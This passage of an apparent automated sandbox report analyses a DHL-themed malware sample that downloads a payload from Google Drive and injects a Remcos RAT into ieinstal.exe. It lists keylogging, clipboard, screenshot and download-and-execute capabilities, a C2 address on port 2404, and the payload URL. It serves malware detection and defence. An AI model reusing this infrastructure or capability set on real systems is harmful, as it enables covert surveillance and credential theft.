Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10538B11 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,12_2_10538B11
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10535FD6 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,12_2_10535FD6
Contains functionality to query local drives
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?
$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403B9A

Networking:

Contains functionality to download and execute PE files
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_1053EDB5 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,12_2_1053EDB5
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.6:49943 -> 185.140.53.106:2404
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 216.58.215.225 216.58.215.225
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to download additional files from the internet
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403463 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,recv,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??4?$basic_string@DU?$char_
traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00403463
Found strings which match known social media URLs
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: doc-0c-9s-docs.googleusercontent.com
URLs found in memory or binary data
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1OZ
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.=
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1oj:
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: http://pki.go
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.imvu.com
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.imvu.comr
Source: ieinstal.exe, 00000013.00000002.2665980703.000000000390C000.00000004.00000040.sdmp | String found in binary or memory: http://www.imvu.comta
Source: ieinstal.exe, 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmp | String found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/0W
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/docs/securesc/7448b6q78tipvgk
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmp | String found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/docs/securesc/7448b6q78tipvgksrv0g7haa8csaak8p/qco2fohb
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-9s-docs.googleusercontent.com/i
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/P
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp, DHL_Details.exe, 00000000.00000003.1115700386.00000000009CF000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/nonceSigner?nonce=8et9054a24khs&continue=https://doc-0c-9s-docs.googleuserco
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/0
Source: DHL_Details.exe, 00000000.00000003.1148432850.00000000009A5000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/h
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/k
Source: DHL_Details.exe, 00000000.00000002.1153823141.00000000042DB000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=download
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=download.J
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/u/0/uc?id=1YeIhasQd-1KZ177FInnElYbHMifTTTeL&export=downloadm
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: ieinstal.exe, 00000013.00000002.2663998039.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: https://www.google.com
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Esc] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Enter] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Tab] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Down] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Right] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Up] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Left] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [End] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F2] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F1] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 12_2_00405DA6
Contains functionality to register a low level keyboard hook
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10536B57 SetWindowsHookExA 0000000D,004051AE,00000000,00000000
Contains functionality to read data from the clipboard
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to read the clipboard data
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to record screenshots
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040F460
Creates a DirectInput object (often for capturing keystrokes)
Source: DHL_Details.exe, 00000000.00000002.1149987017.0000000000910000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 4764, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 5284, type: MEMORY
Source: Yara match | File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00412EE3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,12_2_00412EE3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_10544871 SystemParametersInfoW

System Summary:

Malicious sample detected (through community Yara rule)
